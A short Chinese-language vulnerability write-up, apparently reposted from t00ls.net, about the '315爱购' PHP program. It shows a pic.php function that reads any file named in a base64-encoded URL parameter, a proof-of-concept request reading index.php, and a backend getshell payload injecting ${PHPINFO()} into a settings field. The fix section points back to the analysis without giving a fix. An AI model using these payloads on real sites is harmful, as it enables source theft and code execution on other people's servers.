网站地图    收藏   

主页 > 后端 > 网站安全 >

315爱购程序任意文件源码查看 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 14:11 作者: 阅读:

[导读] pic.phpfunction url_base64_decode($code){ if($code==) return ; $code=str_replace(!,#39;+#39;,$code); $code=str_replace(,,#39;/#39;,$code); $str=base64_decode($code); return $s......

pic.php
 
function url_base64_decode($code)
{
        if($code=="")
                return "";
    $code=str_replace("!",'+',$code);
    $code=str_replace(",",'/',$code);
    $str=base64_decode($code);
    return $str;
}
$url=url_base64_decode($_GET["url"]);
//.... www.2cto.com 省略
header("Content-type: image/jpeg");
echo file_get_contents($url);

测试证明:
http://www.2cto.com /pic.php?url=aW5kZXgucGhw
 
后台GETSHELL
 
系统基本参数->网站所在目录:->${ PHPINFO()}

修复:

请见上述分析
作者 :t00ls.net
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论